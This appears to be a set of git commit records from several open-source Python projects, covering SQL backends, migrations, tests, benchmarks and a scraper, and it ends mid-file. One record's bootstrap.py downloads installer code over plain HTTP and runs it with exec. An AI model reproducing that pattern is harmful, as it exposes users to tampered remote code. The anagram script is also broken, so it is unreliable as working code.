e3b5f7b0f47b1e7ad4ab024c76a270ba9e88aa02 | add impala sqlalchemy resource function | alexmojaki/blaze,jcrist/blaze,ContinuumIO/blaze,LiaoPan/blaze,cpcloud/blaze,maxalbert/blaze,cowlicks/blaze,caseyclements/blaze,ChinaQuants/blaze,ChinaQuants/blaze,dwillmer/blaze,xlhtc007/blaze,scls19fr/blaze,cpcloud/blaze,ContinuumIO/blaze,nkhuyu/blaze,caseyclements/blaze,mrocklin/blaze,scls19fr/blaze,nkhuyu/blaze,cowlicks/blaze,jcrist/blaze,mrocklin/blaze,jdmcbr/blaze,LiaoPan/blaze,xlhtc007/blaze,dwillmer/blaze,alexmojaki/blaze,maxalbert/blaze,jdmcbr/blaze | blaze/sql.py | blaze/sql.py | from __future__ import absolute_import, division, print_function
from .compute.sql import select
from .data.sql import SQL, dispatch, first
from .expr import Expr, TableExpr, Projection, Column, UnaryOp
from .expr.scalar.core import Scalar
from .compatibility import basestring
from .api.resource import resource
import sqlalchemy as sa
__all__ = ['compute_up', 'SQL']
@dispatch((Column, Projection, Expr, UnaryOp), SQL)
def compute_up(t, ddesc, **kwargs):
return compute_up(t, ddesc.table, **kwargs)
@dispatch(Expr, sa.sql.ClauseElement, dict)
def post_compute(expr, query, d):
""" Execute SQLAlchemy query against SQLAlchemy engines
If the result of compute is a SQLAlchemy query then it is likely that the
data elements are themselves SQL objects which contain SQLAlchemy engines.
We find these engines and, if they are all the same, run the query against
these engines and return the result.
"""
if not all(isinstance(val, SQL) for val in d.values()):
return query
engines = set([dd.engine for dd in d.values()])
if len(set(map(str, engines))) != 1:
raise NotImplementedError("Expected single SQLAlchemy engine")
engine = first(engines)
with engine.connect() as conn: # Perform query
result = conn.execute(select(query)).fetchall()
if isinstance(expr, Scalar):
return result[0][0]
if isinstance(expr, TableExpr) and expr.iscolumn:
return [x[0] for x in result]
return result
@dispatch(SQL)
def drop(s):
s.table.drop(s.engine)
@dispatch(SQL, basestring)
def create_index(s, column, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
sa.Index(name, getattr(s.table.c, column), unique=unique).create(s.engine)
@dispatch(SQL, list)
def create_index(s, columns, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
args = name,
args += tuple(getattr(s.table.c, column) for column in columns)
sa.Index(*args, unique=unique).create(s.engine)
@resource.register('(sqlite|postgresql|mysql)://.*')
def resource_sql(uri, table_name, *args, **kwargs):
return SQL(uri, table_name, *args, **kwargs)
@resource.register('impala://.*')
def resource_sql(uri, table_name, *args, **kwargs):
import impala.sqlalchemy
return SQL(uri, table_name, *args, **kwargs)
| from __future__ import absolute_import, division, print_function
from .compute.sql import select
from .data.sql import SQL, dispatch, first
from .expr import Expr, TableExpr, Projection, Column, UnaryOp
from .expr.scalar.core import Scalar
from .compatibility import basestring
from .api.resource import resource
import sqlalchemy as sa
__all__ = ['compute_up', 'SQL']
@dispatch((Column, Projection, Expr, UnaryOp), SQL)
def compute_up(t, ddesc, **kwargs):
return compute_up(t, ddesc.table, **kwargs)
@dispatch(Expr, sa.sql.ClauseElement, dict)
def post_compute(expr, query, d):
""" Execute SQLAlchemy query against SQLAlchemy engines
If the result of compute is a SQLAlchemy query then it is likely that the
data elements are themselves SQL objects which contain SQLAlchemy engines.
We find these engines and, if they are all the same, run the query against
these engines and return the result.
"""
if not all(isinstance(val, SQL) for val in d.values()):
return query
engines = set([dd.engine for dd in d.values()])
if len(set(map(str, engines))) != 1:
raise NotImplementedError("Expected single SQLAlchemy engine")
engine = first(engines)
with engine.connect() as conn: # Perform query
result = conn.execute(select(query)).fetchall()
if isinstance(expr, Scalar):
return result[0][0]
if isinstance(expr, TableExpr) and expr.iscolumn:
return [x[0] for x in result]
return result
@dispatch(SQL)
def drop(s):
s.table.drop(s.engine)
@dispatch(SQL, basestring)
def create_index(s, column, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
sa.Index(name, getattr(s.table.c, column), unique=unique).create(s.engine)
@dispatch(SQL, list)
def create_index(s, columns, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
args = name,
args += tuple(getattr(s.table.c, column) for column in columns)
sa.Index(*args, unique=unique).create(s.engine)
@resource.register('(sqlite|postgresql|mysql)://.*')
def resource_sql(uri, table_name, *args, **kwargs):
return SQL(uri, table_name, *args, **kwargs)
| bsd-3-clause | Python |
d952776a78901ecd20cb8e79cd00f5498e4b04be | Add generate anagrams | gsathya/dsalgo,gsathya/dsalgo | algo/generate_anagrams.py | algo/generate_anagrams.py | import sys
import shuffle from random
word = list(sys.argv[1])
anagrams = []
for i in range(10):
anagrams.append(''.join(shuffle(word)))
print anagrams
| mit | Python | |
2cfd4864df3536f7d8523a0f5f5ef98a5c6113af | add bootstrap.py | nylas/icalendar,untitaker/icalendar,geier/icalendar | bootstrap.py | bootstrap.py | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
"""
import os, shutil, sys, tempfile, urllib2
from optparse import OptionParser
tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith('java')
# parsing arguments
parser = OptionParser()
parser.add_option("-v", "--version", dest="version",
help="use a specific zc.buildout version")
parser.add_option("-d", "--distribute",
action="store_true", dest="distribute", default=False,
help="Use Disribute rather than Setuptools.")
parser.add_option("-c", None, action="store", dest="config_file",
help=("Specify the path to the buildout configuration "
"file to be used."))
options, args = parser.parse_args()
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
args += ['-c', options.config_file]
if options.version is not None:
VERSION = '==%s' % options.version
else:
VERSION = ''
# We decided to always use distribute, make sure this is the default for us
# USE_DISTRIBUTE = options.distribute
USE_DISTRIBUTE = True
args = args + ['bootstrap']
to_reload = False
try:
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
to_reload = True
raise ImportError
except ImportError:
ez = {}
if USE_DISTRIBUTE:
exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0, no_fake=True)
else:
exec urllib2.urlopen('http://peak.telecommunity.com/dist/ez_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0)
if to_reload:
reload(pkg_resources)
else:
import pkg_resources
if sys.platform == 'win32':
def quote(c):
if ' ' in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote (c):
return c
cmd = 'from setuptools.command.easy_install import main; main()'
ws = pkg_resources.working_set
if USE_DISTRIBUTE:
requirement = 'distribute'
else:
requirement = 'setuptools'
if is_jython:
import subprocess
assert subprocess.Popen([sys.executable] + ['-c', quote(cmd), '-mqNxd',
quote(tmpeggs), 'zc.buildout' + VERSION],
env=dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
),
).wait() == 0
else:
assert os.spawnle(
os.P_WAIT, sys.executable, quote (sys.executable),
'-c', quote (cmd), '-mqNxd', quote (tmpeggs), 'zc.buildout' + VERSION,
dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
),
) == 0
ws.add_entry(tmpeggs)
ws.require('zc.buildout' + VERSION)
import zc.buildout.buildout
zc.buildout.buildout.main(args)
shutil.rmtree(tmpeggs)
| bsd-2-clause | Python | |
4d021acd89abc127d50e6bf82064bd7aac2bca1a | Solve compree the string with groupby | rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank | python/compress-the-string.py | python/compress-the-string.py | from itertools import groupby
string = input()
print(" ".join(["({}, {})".format(len(list(group)), char) for char, group in groupby(string)]))
| mit | Python | |
cf3a1c26ab650ad2a87d4b4dcc6754c70abde802 | Create compat.py | Programmeerclub-WLG/Agenda-App | backend/compat.py | backend/compat.py | apache-2.0 | Python | ||
f11ce837f0200d501c34c8fa7b2f5cfd149c18b6 | Add db migrations | wk-tech/crm-smsfly,wk-tech/crm-smsfly,wk-tech/crm-smsfly | SMSFlyCRM/SMSApp/migrations/0002_auto_20160602_2034.py | SMSFlyCRM/SMSApp/migrations/0002_auto_20160602_2034.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-02 20:34
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('SMSApp', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='task',
name='start_date',
),
migrations.AddField(
model_name='task',
name='start_datetime',
field=models.DateTimeField(default=datetime.datetime.now),
),
migrations.AlterField(
model_name='alphaname',
name='status',
field=models.IntegerField(choices=[(0, 'ACTIVE'), (1, 'BLOCKED'), (2, 'MODERATE'), (3, 'LIMITED')], null=True),
),
migrations.AlterField(
model_name='task',
name='end_date',
field=models.DateField(null=True),
),
]
| mit | Python | |
86657d78f220345391dc764db22cd9f02903f3a9 | Add tests | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/initiatives/tests/test_admin.py | bluebottle/initiatives/tests/test_admin.py | # -*- coding: utf-8 -*-
from django.contrib.admin.sites import AdminSite
from django.urls.base import reverse
from bluebottle.initiatives.admin import InitiativeAdmin
from bluebottle.initiatives.models import Initiative
from bluebottle.initiatives.tests.factories import InitiativeFactory
from bluebottle.test.utils import BluebottleAdminTestCase
class TestInitiativeAdmin(BluebottleAdminTestCase):
def setUp(self):
super(TestInitiativeAdmin, self).setUp()
self.site = AdminSite()
self.initiative_admin = InitiativeAdmin(Initiative, self.site)
self.initiative = InitiativeFactory.create()
self.initiative.submit()
self.initiative.save()
def test_review_initiative(self):
self.client.force_login(self.superuser)
review_url = reverse('admin:initiatives_initiative_transition',
args=(self.initiative.id, 'accept'))
response = self.client.get(review_url)
# Should show confirmation page
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Are you sure you want to change')
# Confirm should change status
response = self.client.post(review_url, {'confirm': True})
self.assertEqual(response.status_code, 302, 'Should redirect back to initiative change')
self.initiative = Initiative.objects.get(pk=self.initiative.id)
self.assertEqual(self.initiative.review_status, 'accepted')
def test_review_initiative_unauthorized(self):
review_url = reverse('admin:initiatives_initiative_transition',
args=(self.initiative.id, 'accept'))
response = self.client.post(review_url, {'confirm': False})
# Should be denied
self.assertEqual(response.status_code, 403)
self.initiative = Initiative.objects.get(pk=self.initiative.id)
self.assertEqual(self.initiative.review_status, 'submitted')
| bsd-3-clause | Python | |
a383d1220c31f153a5519e4aab4703db2b71ef53 | Add initial version of season goal leader retrieval | leaffan/pynhldb | analysis/_goal_leaders.py | analysis/_goal_leaders.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from lxml import html
SEASON_URL_TEMPLATE = "http://www.hockey-reference.com/leagues/NHL_%d.html"
CAREER_GOAL_LEADERS_URL = "http://www.hockey-reference.com/leaders/goals_career.html"
season_goal_leaders = set()
for year in range(1918, 2017)[:0]:
# skipping season completely lost to a lockout
if year == 2005:
continue
season = "%d-%s" % (year - 1, str(year)[-2:])
# retrieving raw html data and parsing it
url = SEASON_URL_TEMPLATE % year
r = requests.get(url)
doc = html.fromstring(r.text)
# the stuff we're interested in is hidden in comments
comments = doc.xpath("//comment()")
for comment in comments:
# removing comment markup
sub = html.fromstring(str(comment)[3:-3])
if not sub.xpath("//table/caption/text()"):
continue
if sub.xpath("//table/caption/text()")[0] == "Goals":
leaders = sub
break
# retrieving five best goalscorers in current season as list
five_goal_leaders = leaders.xpath(
"//div[@id='leaders_goals']/table/tr/td[@class='who']/a")
# adding name and link to player page to goalscorer dictionary
for leader in five_goal_leaders:
season_goal_leaders.add(
(leader.xpath("@href")[0], leader.xpath("text()")[0]))
r = requests.get(CAREER_GOAL_LEADERS_URL)
doc = html.fromstring(r.text)
print(sorted(season_goal_leaders))
| mit | Python | |
10ce581d1ecbba29913982a56f32c3d93a1b54fe | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/gamma/benchmark/python/benchmark.py | lib/node_modules/@stdlib/math/base/special/gamma/benchmark/python/benchmark.py | #!/usr/bin/env python
"""Benchmark gamma."""
from __future__ import print_function
import timeit
NAME = "gamma"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import gamma; from random import random;"
stmt = "y = gamma(171.0*random() - 0.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in xrange(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
66328709459b2217b3c964848a363c4f3b1cdf5e | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/trunc/benchmark/python/benchmark.py | lib/node_modules/@stdlib/math/base/special/trunc/benchmark/python/benchmark.py | #!/usr/bin/env python
"""Benchmark trunc."""
from __future__ import print_function
import timeit
NAME = "trunc"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import trunc; from random import random;"
stmt = "y = trunc(1000.0*random() - 500.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in xrange(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
37b175b6a6ac3f0fd7fdaa5c2ed6435c159a29c2 | Add py solution for 553. Optimal Division | ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode | py/optimal-division.py | py/optimal-division.py | from fractions import Fraction
class Solution(object):
def optimalDivision(self, nums):
"""
:type nums: List[int]
:rtype: str
"""
min_result, max_result = dict(), dict()
min_offset, max_offset = dict(), dict()
lnums = len(nums)
def print_ans(start, end, need_max=True):
if start + 1 == end:
return str(nums[start])
if need_max:
cut = max_offset[start, end]
else:
cut = min_offset[start, end]
ans = print_ans(start, cut, need_max) + "/"
if end - cut > 1:
ans += "("
ans += print_ans(cut, end, not need_max)
if end - cut > 1:
ans += ")"
return ans
for i, n in enumerate(nums):
min_result[i, i + 1] = max_result[i, i + 1] = Fraction(n)
for l in xrange(2, lnums + 1):
for i in xrange(lnums - l + 1):
m, M = None, None
mj, Mj = None, None
for j in xrange(1, l):
tm = min_result[i, i + j] / max_result[i + j, i + l]
tM = max_result[i, i + j] / min_result[i + j, i + l]
if m is None or m > tm:
m, mj = tm, i + j
if M is None or M < tM:
M, Mj = tM, i + j
min_result[i, i + l] = m
max_result[i, i + l] = M
min_offset[i, i + l] = mj
max_offset[i, i + l] = Mj
return print_ans(0, lnums)
| apache-2.0 | Python | |
e14c4f1aeb15491ecbf2981527e2409ab3e82653 | Test for BuildQuerySet.concurrent logic | rtfd/readthedocs.org,rtfd/readthedocs.org,rtfd/readthedocs.org,rtfd/readthedocs.org | readthedocs/builds/tests/test_build_queryset.py | readthedocs/builds/tests/test_build_queryset.py | import pytest
import django_dynamic_fixture as fixture
from django.conf import settings
from readthedocs.builds.querysets import BuildQuerySet
from readthedocs.builds.models import Build, Version
from readthedocs.projects.models import Project, Feature
@pytest.mark.django_db
class TestBuildQuerySet:
def test_concurrent_builds(self):
project = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=None,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (False, 2, 4) == Build.objects.concurrent(project)
for state in ('building', 'cloning'):
fixture.get(
Build,
project=project,
state=state,
)
assert (True, 4, 4) == Build.objects.concurrent(project)
def test_concurrent_builds_project_limited(self):
project = fixture.get(
Project,
max_concurrent_builds=2,
main_language_project=None,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (True, 2, 2) == Build.objects.concurrent(project)
def test_concurrent_builds_translations(self):
project = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=None,
)
translation = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=project,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (False, 2, 4) == Build.objects.concurrent(translation)
for state in ('building', 'cloning'):
fixture.get(
Build,
project=translation,
state=state,
)
assert (True, 4, 4) == Build.objects.concurrent(translation)
assert (True, 4, 4) == Build.objects.concurrent(project)
| mit | Python | |
4c428b78f9bf4d5f044a23921a6f29df34c93753 | add python process pool example | yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn | python/process_pool.py | python/process_pool.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from multiprocessing import Pool
def worker(a):
print(a)
if __name__ == "__main__":
p = Pool(10)
p.map(worker, range(0, 1000))
| bsd-3-clause | Python | |
565dab9ae60d6c7fa92d3385ef4515933850d4a0 | Create __init__.py | gwsilva/rdc-16 | rdc_16/__init__.py | rdc_16/__init__.py |
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Gideoni Silva (Omnes)
# Copyright 2013-2014 Omnes Tecnologia
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python | |
1199bba46cc16ec1285ab9d58fa1c74e9061f874 | Create PedidoDeletar.py | AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb | backend/Models/Predio/PedidoDeletar.py | backend/Models/Predio/PedidoDeletar.py | from Framework.Pedido import Pedido
from Framework.ErroNoHTTP import ErroNoHTTP
class PedidoDeletar(Pedido):
def __init__(self,variaveis_do_ambiente):
super(PedidoDeletar, self).__init__(variaveis_do_ambiente)
try:
self.id = self.corpo['id']
except:
raise ErroNoHTTP(400)
def getId(self):
return self.id
| mit | Python | |
8561fba46509db7f74f9770d71dd0ba41e4cb594 | Add bids.ext namespace package for subpackages | INCF/pybids | bids/ext/__init__.py | bids/ext/__init__.py | __path__ = __import__('pkgutil').extend_path(__path__, __name__)
| mit | Python | |
a75b7cf5634e580b78c5f4cad9255735982b51d1 | bump to 0.9.3 | loandy/billy,loandy/billy,sunlightlabs/billy,sunlightlabs/billy,loandy/billy,mileswwatkins/billy,openstates/billy,openstates/billy,sunlightlabs/billy,mileswwatkins/billy,mileswwatkins/billy,openstates/billy | billy/__init__.py | billy/__init__.py | __version__ = '0.9.3'
from billy.conf import settings
class LazyDb(object):
def __init__(self):
self._db = None
def __getattr__(self, attr):
if not self._db:
import pymongo
host = settings.MONGO_HOST
port = settings.MONGO_PORT
db_name = settings.MONGO_DATABASE
conn = pymongo.Connection(host, port)
self._db = conn[db_name]
return getattr(self._db, attr)
db = LazyDb()
| __version__ = '0.9.2'
from billy.conf import settings
class LazyDb(object):
def __init__(self):
self._db = None
def __getattr__(self, attr):
if not self._db:
import pymongo
host = settings.MONGO_HOST
port = settings.MONGO_PORT
db_name = settings.MONGO_DATABASE
conn = pymongo.Connection(host, port)
self._db = conn[db_name]
return getattr(self._db, attr)
db = LazyDb()
| bsd-3-clause | Python |
ac9bcdea0ece3e34943471336499f42213ef5c47 | Create zinnia_markitup module | django-blog-zinnia/zinnia-wysiwyg-markitup,django-blog-zinnia/zinnia-wysiwyg-markitup | zinnia_markitup/__init__.py | zinnia_markitup/__init__.py | """MarkItUp for Django-blog-zinnia"""
| bsd-3-clause | Python | |
d61fc5b219186824b8b198c5a4679602372039da | Create leapBasic.py | MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab | home/Alessandruino/leapBasic.py | home/Alessandruino/leapBasic.py | leap = Runtime.start("leap","LeapMotion")
leap.addLeapDataListener(python)
def onLeapData(data):
print (data.rightHand.index)
leap.startTracking()
| apache-2.0 | Python | |
c25c0a9942345ed46d8091f7705cb26bbb21dfe5 | add plugin test cases | ssato/python-anyconfig-pyjavaproperties-backend,ssato/python-anyconfig-pyjavaproperties-backend | tests/plugin.py | tests/plugin.py | #
# Copyright (C) 2017 Satoru SATOH <satoru.satoh @ gmail.com>
# License: MIT
#
# pylint: disable=missing-docstring,invalid-name
from __future__ import absolute_import
import os.path
import os
import unittest
import anyconfig
_CURDIR = os.path.dirname(__file__)
class Test(unittest.TestCase):
conf_path = os.path.join(_CURDIR, "0.properties")
def test_20_load(self):
conf = anyconfig.load(self.conf_path)
self.assertEquals(conf['b'], "bbb", conf)
# vim:sw=4:ts=4:et:
| mit | Python | |
c4bad78b508369e7ef1c682114c0b04340ed371b | Create an abstract Player class | mbrookes1304/Dudo | Player.py | Player.py | from abc import ABCMeta, abstractmethod
from Dice import Dice
class Player(object):
"""An abstract Dudo player"""
__metaclass__ = ABCMeta
def __init__(self, name):
self._name = name
# Create a set of five dice
self._diceset = set()
self._diceset.add(Dice())
self._diceset.add(Dice())
self._diceset.add(Dice())
self._diceset.add(Dice())
self._diceset.add(Dice())
def getName(self):
"""Returns the players name."""
return self._name
def getDiceSet(self):
"""Return the set of dice belonging to player."""
return self._diceset
def removeDice(self):
"""Returns the set of dice after one is removed."""
self._diceset.pop()
return self._diceset
def addDice(self):
"""Returns the set of dice after one is added.
Player cannot have more than five dice."""
if len(self._diceset) < 5:
self._diceset.add(Dice())
return self._diceset
def rollAllDice(self):
"""Rolls all dice belonging to player."""
for dice in self._diceset:
dice.roll()
def isEliminated(self):
"""Returns true iff the player has no dice left."""
return len(self._diceset) == 0
@abstractmethod
def takeTurn(self):
"""Returns the bid made by the player."""
pass
def __repr__(self):
return self._name + str(self._diceset)
| mit | Python | |
a9ec0b508f9d59d0c920a53141d25de0d6eb1c5f | work in progress | SageBerg/LearnYouATypist,SageBerg/LearnYouATypist,SageBerg/LearnYouATypist | make_lessons.py | make_lessons.py | # -*- coding: utf-8 -*-
import sys
def make_lesson():
arg = sys.argv[1]
f = open(arg)
text = ""
count = 0
for line in f:
text += line
count += 1
if count > 9:
count = 0
text = clean(text)
print text + "\n"
text = ""
print text
def clean(text):
text = text.replace("’", "\'")
text = text.replace("“", "\"")
text = text.replace("”", "\"")
text = text.replace("–", "-")
text = text.replace("—", "-")
return text
make_lesson()
| apache-2.0 | Python | |
54afce985f7f24e74cd5796e12e3c5f2c4616590 | Add Python script to generate (huge) test dumps. | CoolV1994/zPermissions,TWSSYesterday/zPermissions,TWSSYesterday/zPermissions,CoolV1994/zPermissions,ZerothAngel/zPermissions,ZerothAngel/zPermissions | etc/gen-test-dump.py | etc/gen-test-dump.py | #!/usr/bin/env python
import random
WORLDS = [None] * 8 + ['world', 'world_nether', 'creative', 'hardcore']
REGIONS = [None] * 20 + ['Region%d' % i for i in range(10)]
NUM_PLAYERS = 100
NUM_PERMISSIONS_PER_PLAYER = 50
NUM_GROUPS = (3, 13, 23, 31, 41)
NUM_PERMISSIONS_PER_GROUP = 50
NUM_PLAYERS_PER_GROUP = 50
PLAYER_MEMBER_POOL_SIZE = 1000
groups_at_depth = []
for i in range(len(NUM_GROUPS)):
groups_at_depth.append([])
def generate_permissions(name, is_group, count):
for i in range(count):
region = REGIONS[random.randint(0, len(REGIONS) - 1)]
if region is None:
region = ''
else:
region += '/'
world = WORLDS[random.randint(0, len(WORLDS) - 1)]
if world is None:
world = ''
else:
world += ':'
print('permissions %s %s set %s%spermission.%s.%d true' % (
is_group and 'group' or 'player',
name,
region,
world,
name,
i))
def generate_group(name, depth):
if depth == 0:
# Nothing special
print('permissions group %s create' % name)
else:
print('permissions group %s create' % name)
# Pick random parent of previous depth
potential_parents = groups_at_depth[depth - 1]
parent = potential_parents[random.randint(0, len(potential_parents) - 1)]
print('permissions group %s setparent %s' % (name, parent))
assert name not in groups_at_depth[depth]
groups_at_depth[depth].append(name)
def generate_members(name, count):
for i in range(count):
p = random.randint(0, PLAYER_MEMBER_POOL_SIZE - 1)
print('permissions group %s add TestPlayer%d' % (name, p))
def main():
for p in range(NUM_PLAYERS):
generate_permissions('TestPlayer%d' % p, False,
NUM_PERMISSIONS_PER_PLAYER)
group_count = 0
for depth, num_at_depth in enumerate(NUM_GROUPS):
for g in range(num_at_depth):
name = 'TestGroup%d' % group_count
group_count += 1
generate_group(name, depth)
generate_permissions(name, True, NUM_PERMISSIONS_PER_GROUP)
generate_members(name, NUM_PLAYERS_PER_GROUP)
if __name__ == '__main__':
main()
| apache-2.0 | Python | |
f264a4a15682467549326cc530c152f647bf7832 | Add a convenience python script to inline the imports of a file. | JasonGross/catdb,CategoricalData/catdb,CategoricalData/catdb,JasonGross/catdb | replace_imports.py | replace_imports.py | from __future__ import with_statement
import os
file_contents = {}
file_imports = {}
def get_file(file_name):
if file_name[-2:] != '.v': file_name += '.v'
if file_name not in file_contents.keys():
print(file_name)
try:
with open(file_name, 'r', encoding='UTF-8') as f:
file_contents[file_name] = f.read()
except TypeError:
with open(file_name, 'r') as f:
file_contents[file_name] = f.read()
return file_contents[file_name]
def get_imports(file_name):
if file_name[-2:] != '.v': file_name += '.v'
if file_name not in file_imports.keys():
lines = get_file(file_name).split('\n')
import_lines = [i.strip('. ') for i in lines if
i.strip()[:len('Require ')] == 'Require ' or
i.strip()[:len('Import ')] == 'Import ']
imports = set((' ' + ' '.join(import_lines)).replace(' Require ', ' ').replace(' Import ', ' ').replace(' Export ', ' ').strip().split(' '))
file_imports[file_name] = tuple(sorted(imports))
return file_imports[file_name]
def merge_imports(*imports):
rtn = []
for import_list in imports:
for i in import_list:
if i not in rtn:
rtn.append(i)
return rtn
def recursively_get_imports(file_name):
if file_name[-2:] != '.v': file_name += '.v'
if os.path.exists(file_name):
imports = get_imports(file_name)
imports_list = [recursively_get_imports(i) for i in imports]
return merge_imports(*imports_list) + [file_name[:-2]]
return [file_name[:-2]]
def contents_without_imports(file_name):
if file_name[-2:] != '.v': file_name += '.v'
contents = get_file(file_name)
lines = [i for i in contents.split('\n') if
i.strip()[:len('Require ')] != 'Require ' and
i.strip()[:len('Import ')] != 'Import ']
return '\n'.join(lines)
def include_imports(file_name):
if file_name[-2:] != '.v': file_name += '.v'
all_imports = recursively_get_imports(file_name)
remaining_imports = []
rtn = ''
for import_name in all_imports:
if os.path.exists(import_name + '.v'):
rtn += contents_without_imports(import_name)
else:
remaining_imports.append(import_name)
rtn = 'Require Import %s.\n%s' % (' '.join(remaining_imports), rtn)
return rtn
| mit | Python | |
fa067ee22e89111848536c7fa9396575a8f31ac6 | add testhttp.py. | kurniawano/pythymiodw | examples/testhttp.py | examples/testhttp.py | from pythymiodw import ThymioReal
t = ThymioReal()
t.wheels(100,100)
t.sleep(1)
t.quit() | mit | Python | |
5c40193fe8bce5601190223503d27e73cb8dff39 | Create zip.py | DataMonster/Python | exer/zipunzip/zip.py | exer/zipunzip/zip.py | def zip(*arg):
Result = []
Check = 1
#check if every item in arg has the same length
for i in arg:
if len(i) != len(arg[0]):
